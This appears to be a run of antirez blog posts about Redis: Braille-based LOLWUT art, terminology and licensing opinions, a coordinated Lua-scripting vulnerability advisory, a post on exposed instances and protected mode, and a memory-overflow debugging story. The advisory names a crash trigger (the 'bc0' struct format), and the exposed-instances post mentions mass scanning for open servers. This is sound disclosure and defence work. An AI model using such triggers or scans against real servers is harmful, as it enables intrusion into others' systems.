Is it possible to turn a piece of art into a database command? This was challenging, because Redis is mostly used via a command line interface. Terminals are for sure fancier nowadays than the ones of the past, yet displaying decent graphics is still hard. On the other side there is the huge advantage of real time computation: a piece of art can be dynamic, changing every time it is generated.

Before continuing, I want to show you the final result:

[Image: http://antirez.com/misc/lolwut1.png]

While very low resolution, the idea of the original piece is still there. To make this possible I used a trick recently employed by multiple programs trying to display interesting things in a text console. It involves using the Braille Unicode charset in order to create a pixel matrix that is denser than the character grid of the console. Specifically, in each character it is possible to fit a 2x4 grid of pixels, the 8 dots of a Braille pattern.
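
As an illustration of the trick, here is a minimal, self-contained C sketch mapping 2x4 cells of pixels onto single Braille characters. The bit layout follows the Unicode Braille Patterns block, where each of the 8 dots corresponds to a bit added to the base code point U+2800 (the tiny frame buffer is invented for the example):

#include <stdio.h>

/* Bit of each dot, addressed in raster order: the Unicode dot
 * numbering is not in raster order, hence the lookup table. */
int braille_bit[4][2] = {
    {0x01, 0x08},   /* row 0: dots 1 and 4 */
    {0x02, 0x10},   /* row 1: dots 2 and 5 */
    {0x04, 0x20},   /* row 2: dots 3 and 6 */
    {0x40, 0x80}    /* row 3: dots 7 and 8 */
};

/* Emit the UTF-8 encoding of U+2800 + bits: three bytes, since the
 * Braille block lies in the U+0800..U+FFFF range. */
void emit_braille(int bits) {
    int code = 0x2800 + bits;
    putchar(0xE0 | (code >> 12));
    putchar(0x80 | ((code >> 6) & 0x3F));
    putchar(0x80 | (code & 0x3F));
}

int main(void) {
    int pixels[4][8] = {        /* An 8x4 pixel image: a ramp. */
        {0,0,0,0,0,0,0,1},
        {0,0,0,0,0,1,1,1},
        {0,0,0,1,1,1,1,1},
        {0,1,1,1,1,1,1,1}
    };
    for (int cx = 0; cx < 8; cx += 2) { /* Two pixel columns per char. */
        int bits = 0;
        for (int y = 0; y < 4; y++)
            for (int x = 0; x < 2; x++)
                if (pixels[y][cx+x]) bits |= braille_bit[y][x];
        emit_braille(bits);
    }
    printf("\n");
    return 0;
}

Four characters are enough to display the whole 8x4 image, which is how the LOLWUT canvas reaches a resolution higher than the character grid.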

The second part of the experiment was to make the art piece parametric:

[Image: http://antirez.com/misc/lolwut2.png]

It is possible to generate different versions of the original piece, changing the number of squares and the output resolution. Finally, I wanted the source code to be an example of literate programming, written in a form that resembles a tutorial, describing what everything does and why, instead of being some opaque generator. You can find the code here:

https://github.com/antirez/redis/blob/unstable/src/lolwut.c

LOLWUT is also going to be a tradition, starting with Redis 5. At each new major version of Redis, what the command does will change completely; only a set of rules will stay fixed:

1. It can’t do anything technologically useful.
2. It should be fast at doing what it does, so that it is safe to call LOLWUT on production instances.
3. The output should be entertaining in some way.

I wrote the first one for Redis 5. For the next versions, if I find interest, I'll ask somebody else who contributed to Redis to write the other LOLWUT versions; otherwise I'll write them again myself (but I hope that's not the case). LOLWUT should remind us that the work we do, programming, did not start just in order to produce something useful. Initially it was mainly a matter of exploring possibilities. I hope that LOLWUT will also remind the Redis community that computers are about humans, and that it is not possible to reason in an aseptic way, thinking only about the technological implications. There are people using systems, people building systems, and so forth.
On Redis master-slave terminology http://antirez.com/news/122 Thu, 06 Sep 2018 21:04:56 +0000
I said that I was sorry he was disappointed about that, but at the same time, I don't believe that terminology out of context is offensive: if I use master-slave in the context of databases, I'm not referring in any way to slavery. I originally copied the terms from MySQL, and now they are the way we call things in Redis. Since I do not believe in this battle (I'll tell you later why), changing the documentation, deprecating the API and adding a new one, and changing the INFO fields, just to make a subset of people that care about those things happier, does not make sense to me.

After it was clear that I was not interested in his argument, Mark accused me of being fascist. Now, I'm Italian, and incidentally my great-grandfather was put in jail for years by the fascists because he was a communist and against the regime. He was released only to die at home a couple of months later. My mother's father, instead, went to the north of Italy during World War II and was able to escape from the Nazis by a miracle. He stayed 5 years as a refugee, and eventually returned home to become the father of my mother. Mark does not care about the terminology he uses against other people, as long as the matter at hand is making sure that people who may potentially feel offended will not be.

Now, it’s time for you to know my political orientation, so that you can put my refusal to change terminology in context. I want my government to be more open to immigration, including economic immigration; I do not accept any racism, and I was strongly in favor of the “ius soli” law here in Italy. I do not just accept same-sex marriage conceptually: I really love the beauty there is in two men or two women kissing, having sex, adopting a child. Every day on Facebook and within my social sphere I actively talk about politics in order to push for equality. I believe in a systematic bias that our society perpetuates against women, and I’m proud to live in a country where women are free not to recognize a child as their own after giving birth, in order to have the same rights as the biological father that can walk away: this was a big win of the European feminist movement in the 70s, together with the right to abortion. I’m proud that in my country there is no death penalty, as in the rest of the EU, that guns are mostly banned, and that there is free universal healthcare.

Honestly, I do not believe I am fascist or racist, and I write about all these things almost daily on Facebook with my friends, talk to people on the street, and so forth. I have done so for years and years, since I was 16. So, what’s the problem with changing this terminology?

The first problem is that every terminology is offensive in principle, and I don’t want to accept the idea that certain problematic words, especially ones Americans need to ban to make peace with their past, should be forbidden. For example, if I’m terminally ill, the “short living request” terminology may be offensive: it reminds me that I’m going to die, or that my father is going to die. Instead of banning every word out there, we should make the mental effort to do better than the political correctness movement, which stops at the surface. So, let’s call it master-slave, and instead make a call for the US, where a sizable part of the black population is very poor, to have free healthcare, to have cops that are less biased against non-white people, to stop the death penalty. This makes a real difference. For instance Europeans, who are a lot less sensitive to political correctness, managed to do a much better job on that stuff.

There is more: I believe that political correctness has a puritan root. As such it focuses on formalities, but actually hides a real root of prejudice against others. For instance Mark bullied me because I was not complying with his ideas, showing a problem with accepting differences in the way people think. I believe that this environment is making it impossible to have important conversations. For instance nobody at this point wants to talk about women in tech and about the systematic bias against women in our society (to the point that recently in Japan it was discovered that women were systematically stopped from entering the best medical schools). People will go away once the discussion starts, because everybody knows that at this point talking about these matters is a huge PR error that can cost you your job or your company. Many, while reading this blog post, are thinking that I’m crazy to write this stuff, even if they think likewise. Well, I don’t want the people that did this to our ability to have conversations to get a free pass to tell others what to do, because conversation is the only way we can make people that don’t yet have an open vision change their ideas.

Moreover I don't believe in the right to be offended, because it's a subjective thing. Different groups may feel offended by different things. To preserve the right of not being offended, it becomes basically impossible to say or do anything in the long run. Is this the evolution of our society? A few days ago on Hacker News I discovered I can no longer say "fake news", for instance.

I want a world of equity, opportunities, redistribution of wealth, and open borders. But the way I believe this world can be obtained is not by banning words, nor by stalking people on Twitter so that they comply with your ideology. I’ll continue my local political activity, and I’ll continue to write open source software. I hope that Mark, and the others like Mark, will let me live my life as I decided to.
Redis is not "open core" http://antirez.com/news/121 http://antirez.com/news/121 Fri, 24 Aug 2018 22:38:52 +0000
The simplification this time does not work, if it is in your interest to capture the truth of what is happening here. An open core technology requires two things. One is that the system is modular; the other is that parts of such a system are made proprietary in order to create a product around an otherwise free software. For example, providing a single node of a database as open source, while having the clustering logic and mechanism implemented in a different non-free layer, is an open core technology. Similarly, it is open core if I write a relational database with a modular storage system, but the only storage engine able to provide strong guarantees is non-free. In an open core business model around an open source system it is *fundamental* that you take something useful out of the free software part.

Now, Redis has been a modular system for some time. You can use Redis modules in order to write many things, including new distributed systems using the recently introduced cluster message bus API, or new data types that look native. However the reason to make Redis modular was not to remove something useful from the system and put a price tag on it. For instance one of the new data structures in Redis 5, streams, is part of the core and released under the BSD license. Streams were implemented when Redis was already a modular system.
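
To give an idea of what the module API looks like, here is more or less the minimal module, a sketch modeled after the helloworld.c example shipping in the Redis source tree (the module and command names here are made up for illustration). Once compiled as a shared object and loaded with MODULE LOAD, the new command looks exactly like a native one:

#include "redismodule.h"

/* Implementation of the HELLO.WORLD command: just reply "world". */
int HelloWorld_RedisCommand(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    return RedisModule_ReplyWithSimpleString(ctx, "world");
}

/* Called by Redis when the module is loaded: register the module and
 * its commands. */
int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    if (RedisModule_Init(ctx,"hello",1,REDISMODULE_APIVER_1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx,"hello.world",HelloWorld_RedisCommand,
        "readonly",0,0,0) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    return REDISMODULE_OK;
}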

Redis modules started from a different observation. As a premise I should say that I’m a very conservative person about software development. I believe that Redis should be focused on addressing just the things that, when operated with in-memory data structures, offer strong advantages over other ways to do the same thing. I don’t want Redis to do much more than it does, or to employ every possible consistency tradeoff. I want Redis to be Redis, that is, a general tool that the developer can use in different ways to solve certain problems.

However at Redis Labs we observed multiple times that it’s a bit of a shame that Redis cannot solve certain specific problems. For instance, what if Redis were a serious full text search engine? Also, developers want JSON so much: what about having an API that talks JSON directly? And given that in-memory graphs, if represented wisely, can be so fast, what about having graph database abilities, with a rich query language? Redis Labs customers often asked directly for such things. And actually, such features could be cool, but they are not Redis, I’m not interested, and the open source side of Redis does not have the development force to keep all these things going anyway. And this is a major advantage both for Redis and for Redis Labs: it is relatively cheap to pay just for me and a bit more OSS development time internally, while allocating the rest of the resources to the development of things that are useful for the Redis Labs business, like making sure the Redis enterprise SaaS and products are good. There is anyway a great deal of contributions arriving from the community. And I also keep saying “no” to all these fancy ideas that would take Redis into other areas… which is also a problem.

Still, to have such things, similar to Redis but outside the Redis scope, would be cool, because, you know, while it’s not the Redis mission, people may very well use a fast inverted index with full text search capabilities that you can feed in real time, while it serves a very good amount of queries per core at the same time. This is what Redis Labs is doing: it’s using the same Redis technology and approach to do more than what Redis wanted to do. Not just in the functionality areas, but also in other areas like consistency models. I’m very opinionated about certain things, and I think that, for instance, CRDTs, while super cool in certain use cases, were not the right thing for Redis, which should retain the same memory footprint, performance and simplicity, even at the cost of having a weaker consistency model. So Redis Labs, together with a top researcher in the area, did it (and this is a proprietary product without any source available). I can see how such a feature can be tremendously useful for certain operations, but Redis was not there to solve everything, so Redis Labs did it.

This is not open core. Redis Labs is doing things that you would never see from me: because of bandwidth, and because I believe that not all software must eventually become huge.
So I think that calling this model “open core” is misleading: nothing is removed from the Redis table, just new things are explored, while trying to follow the “Redis way” in areas otherwise not touched by the Redis project.
Redis will remain BSD licensed http://antirez.com/news/120 http://antirez.com/news/120 Wed, 22 Aug 2018 13:45:52 +0000
What is happening instead is that certain Redis modules, developed inside Redis Labs, are now released under the Commons Clause (using the Apache license as the base license). This means that basically certain enterprise add-ons, instead of being completely closed source as they could be, will be available under a more permissive license.

I think that the Redis Labs Commons Clause page did not provide clear and complete information, but software companies often make communication errors; it happens. To me, however, it looks more important that, while running a system software business in the “cloud era” (LOL) is very challenging with an open source license, Redis Labs totally understood and supported the idea that the Redis core is an open source project, under the *most permissive license ever*, that is, BSD, and over the years provided a lot of funding to the project.

The reason why certain modules developed internally at Redis Labs are switching license is that they are added value that Redis Labs wants to provide only to end users that are willing to compile and install the system themselves, or to the Redis Labs customers using their services. But it’s not ok to give away that value to everybody willing to resell it. An example of such a module is RediSearch: it was AGPL and is now going to be Apache + Commons Clause.

About myself, I’ll keep writing BSD code for Redis. For the Redis modules I’ll develop, such as Disque, I’ll pick the AGPL instead, for similar reasons: we live in a “Cloud-poly”, so it’s a good idea to go forward with licenses that will force other SaaS companies to redistribute back their improvements. However this does not apply to Redis itself. Redis at this point is a 10 year collective effort, the base for many other things that we can do together, and this base must be as available as possible, that is, BSD licensed.

We at Redis Labs are sorry for the confusion generated by the Commons Clause page, and my colleagues are working to fix the page with better wording.
Redis Lua scripting: several security vulnerabilities fixed http://antirez.com/news/119 http://antirez.com/news/119 Wed, 13 Jun 2018 17:15:05 +0000
Those vulnerabilities are mostly relevant in the specific case of providing managed Redis servers on the cloud, because it is very unlikely that the vulnerabilities discovered can be exploited without direct access to the Redis server: many Redis users don’t use the cmsgpack or the struct packages at all, and those who do are very unlikely to feed them with untrusted input. However for cloud providers things are different: they have Redis instances, sometimes in multi tenancy setups, exposed to the users that subscribed for the service. Such users can send anything to those Redis instances, triggering the vulnerabilities, corrupting the memory, violating the Redis process, and potentially taking total control of it.

For instance this simple Python program can crash Redis using one of the cmsgpack vulnerabilities [1].

[1] https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a

However from the point of view of normal Redis users, who control what is sent to their instances, the risk is limited to feeding untrusted data to a function like struct.unpack() after selecting the particularly dangerous decoding format “bc0” in the format argument.

# Coordinating the advisory

Thanks to the cooperation and friendly communication between the Apple Information Security team, me, and the Redis cloud providers, I coordinated the release of the vulnerability after contacting all the major Redis providers out there, so that they could patch their systems before the bug was published. I provided a single patch, so that the providers could easily apply it to their systems. Finally, between yesterday and today, I prepared new patch releases of Redis 3, 4 and 5, with the security fixes included. They are all already released as you read this blog post. Unfortunately I was not able to contact smaller or newer cloud providers. The effort to handle the communication with Redis Labs, Amazon, Alibaba, Microsoft, Google, Heroku, Open Redis and Redis Green was already massive, and the risk of leaks from extending the information sharing to other subjects even higher (every company included many persons handling the process). I’m sorry if you are a Redis provider finding out about this vulnerability just today; I tried to do my best.

I want to say thank you to the Apple Information Security team and all the other providers for the hints and help about this issue.

# The problem with Lua

Honestly, when the Redis Lua engine was designed, it was not conceived with this security model of the customer vs the cloud provider in mind. The assumption kinda was that you can trust whoever pokes at your Redis server. So in general the Lua libraries were not scrutinized for security. The feeling back then was: if you have access to the Redis API, you can do far worse anyway.

However later things evolved, and cloud providers restricted the Redis API exposed to their customers, so that it became possible to provide managed Redis instances. But while things like the CONFIG or DEBUG commands can be denied, you can’t really avoid exposing EVAL and EVALSHA: Lua scripting is one of the most used features in our community.

So gradually, without me really noticing, the Lua libraries also became an attack vector in a security model that should instead be handled by Redis, because of the change in the way Redis is exposed and provided to the final user. As I said, in this model it is the managed Redis “cloud” provider, more than the Redis user, that is affected, but regardless it is a problem that must be handled.

What can we do in order to improve the current state of cloud provider security, regarding this specific problem with Lua scripting? I identified a few things that I want to do in the next months.

1. Lua stack protection. It looks like Lua can be compiled, with some speed penalty, in a way that ensures that it is not possible to misuse the Lua stack API. To be fair, I think that the assumptions Lua makes about the stack are a bit too trivial, with the Lua library developer having to constantly check if there is enough space on the stack to push a new value (see the C sketch after this list). Other languages at the same level of abstraction have C APIs that don’t have this problem. So I’ll try to understand if the slowdown of applying more safeguards in the Lua low level C API is acceptable, and in that case, implement it.

2. Security auditing and fuzz testing. Even if my time was limited, I already performed some fuzz testing on the Lua struct library. I’ll continue with an activity that will check for other bugs in this area. I’m sure there are many more issues; the fact that we found just this set of bugs is only due to the fact that there was no more time to investigate the scripting subsystem. So this is an important activity that is going to be performed. Again, at the end of the activity, I’ll coordinate with the Redis vendors so that they can patch in time.

3. From the point of view of the Redis user, it is important that when some untrusted data is sent to the Lua engine, an HMAC is used in order to ensure that the data was not modified. For instance there is a popular pattern where the state of a user is stored in the user cookie itself, to be later decoded. Such data may later be used as input for Redis Lua functions. This is an example where an HMAC is absolutely needed in order to make sure that we read what we previously stored.

4. More Lua sandboxing. There should be plenty of literature and good practices about this topic. We already have some sandboxing implemented, but my feeling, from my security days, is that sandboxing is ultimately always a cat and mouse game, and can never be executed in a perfect way. CPU / memory abuses for example may be too complex to track for the goals of Redis. However we should at least make sure that violations result in a “graceful” abort without any memory violation issue.

5. Maybe it’s time to upgrade the Lua engine? I’m not sure if newer versions of Lua are more advanced from the point of view of security; moreover we have the huge problem that upgrading Lua will result in old scripts potentially no longer working. That is a very big issue for the Redis community, especially since, for the kind of scripts Redis users normally develop, a more advanced Lua version is only marginally useful.
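
About point 1, this is the kind of discipline the Lua C API currently demands from library authors. The following is a generic sketch (not Redis code): a C binding pushing an unbounded number of values must remember to call lua_checkstack() first, and forgetting this check is exactly the class of error that corrupts memory:

#include <lua.h>

/* Push n string elements on the Lua stack, growing the stack first
 * instead of assuming that the guaranteed LUA_MINSTACK free slots are
 * enough. Returns 0 if the stack cannot grow. */
int push_strings(lua_State *L, const char **strings, int n) {
    if (!lua_checkstack(L, n)) return 0; /* refuse instead of overflowing */
    for (int i = 0; i < n; i++) lua_pushstring(L, strings[i]);
    return 1;
}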

# The issues

The problems fixed are listed in the following commits:

ce17f76b Security: fix redis-cli buffer overflow.
e89086e0 Security: fix Lua struct package offset handling.
5ccb6f7a Security: more cmsgpack fixes by @soloestoy.
1eb08bcd Security: update Lua struct package for security.
52a00201 Security: fix Lua cmsgpack library stack overflow.

The first commit is unrelated to this effort: it is a redis-cli buffer overflow that can be exploited only by passing a long host argument on the command line. The other issues are the problems that we found in cmsgpack and the struct package.

The two scripts to reproduce the issues are the following:

https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a

and

https://gist.github.com/antirez/bca0ad7a9c60c72e9600c7f720e9d035

Both were authored by the Apple Information Security team. However the first was modified by me in order to make it cause the crash more reliably.

# Versions affected

Basically every Redis version with Lua scripting is affected.

The fixes are available as the following Github tags:

3.2.12
4.0.10
5.0-rc2

The stable release (4.0.10) is also available at http://download.redis.io as usual.

Releases tarball hashes are available here:

https://github.com/antirez/redis-hashes

Please note that the released versions also include several other bugfixes, so it’s a good idea to also read the release notes to know what else you are upgrading by switching to the new version.

I hope to be back with a blog post in the future with the report of the security auditing that is planned for the Lua scripting subsystem in Redis.
Clarifications on the Incapsula Redis security report http://antirez.com/news/118 http://antirez.com/news/118 Sat, 02 Jun 2018 17:52:39 +0000
[1] https://www.incapsula.com/blog/report-75-of-open-redis-servers-are-infected.html

Many folks don’t need any clarification about all this, because if you have some grip on computer security and how Redis works, you can contextualize all this without much effort. However I’m writing this blog post for two reasons. The obvious one is that it can help the press and other users that are not much into security and/or Redis to understand what’s going on. The second is that the exposed Redis instances are a case study about safe defaults that should be interesting for security circles.

The Incapsula report
===

Let’s start with the Incapsula report. What they did was to analyze exposed Redis instances on the internet: instances that everybody from any place on the internet can access, because they are listening for connections on a public IP address, without any password protecting them. It is as if they were HTTP servers, but it’s Redis instead, which is not designed to be left exposed.

This is far from a new story. Because of Redis popularity the number of total Redis installations is pretty huge, and a fraction of these installations are left exposed. It has been like that since the start, basically. People spin up a virtual machine in some cloud provider, install Redis, find that they cannot access it, open the port of the VM to anyone, and the instance is at this point running unprotected. The only thing that changed is that in the past most of those instances were left running unaffected. Maybe some script kiddie could connect and call “INFO” or a few more commands to check what was inside, and that was it most of the time. Now the new crypto mining obsession is providing attackers a very good reason to break into other people’s systems. Actually the best of reasons: money. So the same exposed instances are now cracked in order to install software that mines some kind of crypto currency. Incapsula checked the percentage of instances that look violated.

The way they collected the kinds of attacks used against Redis instances was by running, on purpose, a set of exposed instances, to monitor how the attackers would target them. Many of the attacks look like variations of my own example attack [2].

[2] http://antirez.com/news/96

Also it is worth noting that scanning the IPv4 address space in order to find exposed instances of any kind of service is trivial. You could use, for instance, masscan. But you could do the same 20 years ago using my own hping, and I remember doing it back then with success indeed.

TLDR: there are open Redis instances on the internet because they are misconfigured. Attackers profit from them by installing some kind of mining software, or for other reasons. But there is more… keep reading.

Protected mode
===========

Security is a terrible field in my opinion. I worked in that field, and decided to go away once it started to be no longer an underground affair. People are very opinionated about security issues while, at the same time, there is little real care about, for instance, performing security audits on real world systems (something that Google Project Zero is changing a bit, btw). So after receiving for the Nth time some PGP encrypted email saying that Redis was vulnerable to a temp file creation attack, I wrote the blog post at [2], just to say: “maybe you are missing the point of Redis security”. I basically published an attack against my own system, one that I could find in a few minutes of research, and that was very serious. The message was, again, that Redis is not designed to be left exposed, and if you really want to play the hack3rzzz look, there are more interesting things to do. However by doing that I put in the hands of script kiddies a great weapon to break into the thousands of Redis instances open everywhere.

In order to pay back my fault, in an attempt to atone for my sin, I started to think about what I could do to make the situation simpler. One problem of Redis 3.x was that by default it would listen on all the IP addresses, so it was simple to misconfigure: just open the port, or have no firewalling at all, and the instance is exposed. The security mantra about that is “run with safe defaults”. That would mean, in the case of Redis, a networked cache, to have a default configuration that basically more or less does not work out of the box for most real world users. And what is worse, people that don’t have a clue would just “bind *” to fix the problem, and we are back at the initial condition. So I tried to find something a bit smarter, a feature that I named “protected mode”, with the great disappointment of a group of 386 processors that protested in front of my house for days.

The idea of protected mode is to listen on every address, but if the connection is not local, the server replies with an error explaining *why* it is not working as expected, what to do, and the risks involved in just doing the silly thing of opening the instance to everybody by disabling protected mode. This is an example of how the feature works:

$ nc 192.168.1.194 6379
-DENIED Redis is running in protected mode because protected mode is enabled, no bind address was specified, no authentication password is requested to clients. In this mode connections are only accepted from the loopback interface. If you want to connect from external computers to Redis you may adopt one of the following solutions: 1) Just disable protected mode sending the command 'CONFIG SET protected-mode no' from the loopback interface by connecting to Redis from the same host the server is running, however MAKE SURE Redis is not publicly accessible from internet if you do so. Use CONFIG REWRITE to make this change permanent. 2) Alternatively you can just disable the protected mode by editing the Redis configuration file, and setting the protected mode option to 'no', and then restarting the server. 3) If you started the server manually just for testing, restart it with the '--protected-mode no' option. 4) Setup a bind address or an authentication password. NOTE: You only need to do one of the above things in order for the server to start accepting connections from the outside.
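
Conceptually the check is very simple. The following is a sketch of the logic (for illustration only, not the actual code in networking.c): only when the user provided no explicit configuration at all, non-local connections get the verbose error above instead of being served.

#include <string.h>

/* Return 1 if the connection can be served, 0 if it must be refused
 * with the -DENIED error. */
int connection_allowed(int protected_mode, int has_bind_address,
                       int has_password, const char *peer_ip) {
    if (!protected_mode || has_bind_address || has_password) return 1;
    if (strcmp(peer_ip, "127.0.0.1") == 0 || strcmp(peer_ip, "::1") == 0)
        return 1; /* loopback clients are always welcome */
    return 0;     /* the caller replies with the error and closes */
}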

The advantage here is that:

1. The user knows what to do in order to fix the situation. It’s much better than “connection refused”.

2. We try to avoid the user disabling protected mode without understanding the risk involved, and without knowing that there are other solutions (setting a password or binding to certain interfaces).

Disillusion
========

So my illusion was that, maybe, it could be more helpful than the plain safe defaults. But unfortunately you can’t fix the fact that a percentage of users just don’t care, that some don’t even know they are installing Redis, because it’s there just as a side effect of being a dependency for something else, or is installed by a script, or is included in the machine image they are running, and so forth.

Initially, by grepping on Shodan, it looked like Redis 4.0 protected mode was actually helping quite a lot! The open instances I could find replied “-DENIED” for the most part. That was great. However after the publication of [1] I asked Shodan (btw they rock and were super helpful on Twitter) if I could have the version breakdown of the exposed Redis instances. And the result is: there are still tons of Redis 4.0 instances exposed [3].

[3] https://asciinema.org/a/8heQvivQkFmUrisbb9FQLfMBj

It is true that they are fewer than the 3.0 instances, but they are still a lot. By investigating more I was even told that there are VM images where Redis protected mode is *removed* by the installation script by default, since sometimes people are annoyed by security features. They want things to just work over the network out of the box, so this is what they do: remove the annoyance. Then such an image becomes popular, and many folks install it without knowing what’s going on, and when Redis 4 is installed protected mode is off and the instance is exposed.

I think this is a lesson about safe defaults that can be trivially disabled by users. It looks like they can help in some way, but just by reducing the number of incidents by some percentage, not by making them a rare exception.

What’s next?
=========

One of the fundamental problems in the Redis security model is that the server can be reconfigured via the normal API, using special commands like CONFIG. This is a very valuable feature of Redis, but it makes it much simpler to break into the instance once you have access to the Redis API, and normal applications using Redis don’t need this level of access.

So in the course of Redis 6, what will happen is that we’ll introduce ACLs. Again, this feature will be introduced trying to offer a “no pain” experience for existing users. If you connect without any credential, Redis will log in the client automatically as the “default” user, which can do everything applications normally do, but will be denied all the administrative commands. Of course it will be possible to make things more strict by configuring them differently: create new users that can only call certain commands on keys matching a given pattern, and so forth.

In the course of Redis 6 we also plan to merge support for SSL connections. This is unlikely to have any impact on the issue discussed here, because by default Redis will run unencrypted and the feature will be opt-in; however SSL is also one step forward towards a more secure Redis experience in certain environments.

However my hopes are on ACLs, because it looks unlikely that the casual user will make the default account able to run the administrative commands, especially because we plan to log in connections originating from the local host as the “admin” user directly. If this goes as I hope, we’ll continue to see Redis 6 instances exposed, because that is inevitable, but at least those Redis 6 instances should make it harder to compromise the whole system. At least in theory: the Redis EVAL command allows the execution of Lua scripts, and such a feature has to be allowed by default, since it is a fundamental Redis feature. We try to have a kind of sandboxed Lua execution environment, but if you have followed IT security for some time, you know that sandboxes are always imperfect, and more an exercise in finding how to escape them than a sealing solution. This time however I’ll avoid publishing an attack just to make a point.
A short tale of a read overflow http://antirez.com/news/117 http://antirez.com/news/117 Wed, 07 Feb 2018 20:30:39 +0000
When a long running process crashes, it is pretty uncool. More so if the process happens to hold a lot of state in memory. This is why I love web programming frameworks that are able, without major performance overhead, to create a new interpreter and a new state for each page view, and deallocate every resource used at the end of the page generation. It is an inherently more reliable programming paradigm, where memory leaks, descriptor leaks, and even random crashes from time to time do not constitute a serious issue. However system software like Redis is at the other side of the spectrum, a side populated by things that should never crash.

Months ago I received a crash report from my colleague Dvir Volk. He was developing his RediSearch Redis module, so it was not clear if the crash was due to a programming error inside the module, perhaps corrupting the heap, or a bug inside Redis. However it looked a lot like a real problem in the radix tree implementation:

=== REDIS BUG REPORT START: Cut & paste starting from here ===
# Redis 999.999.999 crashed by signal: 11
# Crashed running the instruction at: 0x7fceb6eb5af5
# Accessing address: 0x7fce9c400000
| Backtrace:
| redis-server *:7016 [cluster](raxRemoveChild+0xd3)[0x49af53]
| redis-server *:7016 [cluster](raxRemove+0x34f)[0x49b34f]
| redis-server *:7016 [cluster](slotToKeyUpdateKey+0x1ad)[0x4415dd]

The radix tree code is full of memmove() calls, and Redis crashed exactly while trying to access a memory address that was oddly zero padded at the end: 0x7fce9c400000. My first thought was: I’m sure I’m doing some wrong memory movement here, the address gets overwritten with zeroes, and the crash happens when the program attempts to dereference the address.

I’m pretty proud of my radix tree implementation. Not because of the implementation itself: while it’s a complex data structure to implement, it’s not rocket science. But because of the fuzz tester that comes with it, which is able to cover the whole source code (trivial) and a lot of non trivial states (that’s definitely more interesting). The fuzz tester does not do fuzzing just to reach a crash: it compares the implementation of the radix tree dictionary and iterator with a reference implementation that uses a hash table and qsort, having exactly the same semantics, but in a short and easy to audit implementation. After receiving the crash report I improved the fuzz tester, ran it for days, with and without Valgrind, wrote additional data models, created tests using 100 million keys, but despite the efforts I could not reproduce the crash. Only a few days ago I would discover that there was no bug in the implementation I was testing, but at the time I was not aware of that: I could simply never find a bug that was not there. So after failing to reproduce it, I gave up.

One week ago I received two additional bug reports that were almost the same. And again, the addresses were zero padded:

Dvir crash: Accessing address: 0x7fce9c400000
Issue 4605: Accessing address: 0x7f2959e00000
Issue 4642: Accessing address: 0x7f0e9b800000

It was time to read every memmove(), memcpy() and realloc() call inside the source code, trying to figure out if there was something wrong that for some reason the fuzz tester was not able to catch. I found nothing, but then, inspecting the Redis crash report, I noticed something funny. During crashes Redis reports the memory mapped areas of the process, things like the following:

*** Preparing to test memory region 7f0e8c400000 (255852544 bytes)

Now, if you add 255852544 to 0x7f0e8c400000, the result is 0x7f0e9b800000, which is exactly the accessed address in the crash reported in issue 4642. So the program was not crashing because the memory address was corrupted, but because it was accessing an address immediately after the end of the heap. I checked the other issues, and the same was true in all the instances. Basically the end of the heap, at the edge of the start of the unmapped addresses, was acting as a memory guard, able to detect, with a crash, an access performed outside the bounds. This is a common technique that certain C memory sanitation tools used to employ in the past. Such tools would provide a drop in replacement for malloc() that would return addresses allocated at the edge of a non accessible memory page. Every overflow would be immediately detected this way.
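
For reference, a minimal sketch of such a guarded allocator could look like this (an “electric fence” style toy, for illustration only): the returned block ends exactly where a PROT_NONE guard page begins, so any access past the end of the buffer faults immediately instead of silently reading the heap.

#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

void *guarded_alloc(size_t size) {
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t total = ((size + page - 1) / page + 1) * page; /* data + guard */
    char *base = mmap(NULL, total, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED) return NULL;
    mprotect(base + total - page, page, PROT_NONE); /* the guard page */
    return base + (total - page) - size; /* block ends at the guard page */
}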

Because the program would crash only in that specific case, when deallocating a radix tree node at the end of the heap, it was simple to realize that the problem was a read overflow. You can never detect a read overflow otherwise: it will just access data outside your structure, but inside mapped memory, so the bug is totally harmless and silent, except when the same operations are performed at the end of the mapped region. Finally I had a clear place to look at, this portion of C code:

/* 3. Remove the edge and the pointer by memmoving the remaining children pointer and edge bytes one position before. */
int taillen = parent->size - (e - parent->data) - 1;
debugf("raxRemoveChild tail len: %d\n", taillen);
memmove(e,e+1,taillen);
/* Since we have one data byte less, also child pointers start one byte before now. */
memmove(((char*)cp)-1,cp,(parent->size-taillen-1)*sizeof(raxNode**));
/* Move the remaining "tail" pointer at the right position
as well. */
size_t valuelen = (parent->iskey && !parent->isnull) ? sizeof(void*) : 0;
memmove(((char*)c)-1,c+1,taillen*sizeof(raxNode**)+valuelen);
/* 4. Update size. */
parent->size--;

I asked the user to send me the redis-server binary that produced the crash report, and reading the disassembled code it was clear that many CPU registers, also included in the Redis crash report, were still populated with the variables above! Note that the CPU registers RDI, RSI and RDX are used in order to pass the first three arguments to memmove(). In one of the crashes we had:

parent = RBP = 7f2959dffff
Checking RDI, RSI, RDX we extract the memmove() arguments:
memmove(00007f2959dffff4,00007f2959dffffd,0000000000000008);
The memmove will go out of bounds, accessing up to 7f2959e00004.

So I had my proof. But there was more: checking other registers I could also reconstruct the node header, in order to understand how the memmove() count argument was computed. Something was definitely wrong there. Basically I was seeing that the disassembled executable did not match the C function I was reading. How was that possible? The read past the buffer should not happen, because the state was sane: only the count was incorrectly computed by the crashing instance. It was night, and I had worked on this damn thing for two days non stop, so I decided to create a gist and post it on Twitter, to see if somebody could explain how such C could be turned into such assembly by the compiler.

